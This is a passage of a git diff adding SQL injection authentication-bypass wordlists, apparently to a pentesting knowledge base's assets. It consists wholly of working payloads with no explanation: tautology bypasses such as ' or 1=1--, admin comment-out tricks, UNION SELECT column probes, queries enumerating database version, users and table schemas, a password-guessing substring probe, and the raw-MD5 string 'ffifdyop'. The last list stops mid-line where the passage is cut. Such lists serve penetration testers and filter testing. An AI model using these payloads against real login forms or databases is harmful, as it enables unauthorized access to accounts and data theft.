+"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/.gitbook/assets/sqli-authbypass-small.txt b/.gitbook/assets/sqli-authbypass-small.txt new file mode 100644 index 00000000000..331068b4776 --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-small.txt @@ -0,0 +1,197 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 +ffifdyop \ No newline at end of file diff --git a/.gitbook/assets/sqli-authbypass.txt b/.gitbook/assets/sqli-authbypass.txt new file mode 100644 index 00000000000..5a03da57f0f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass.txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 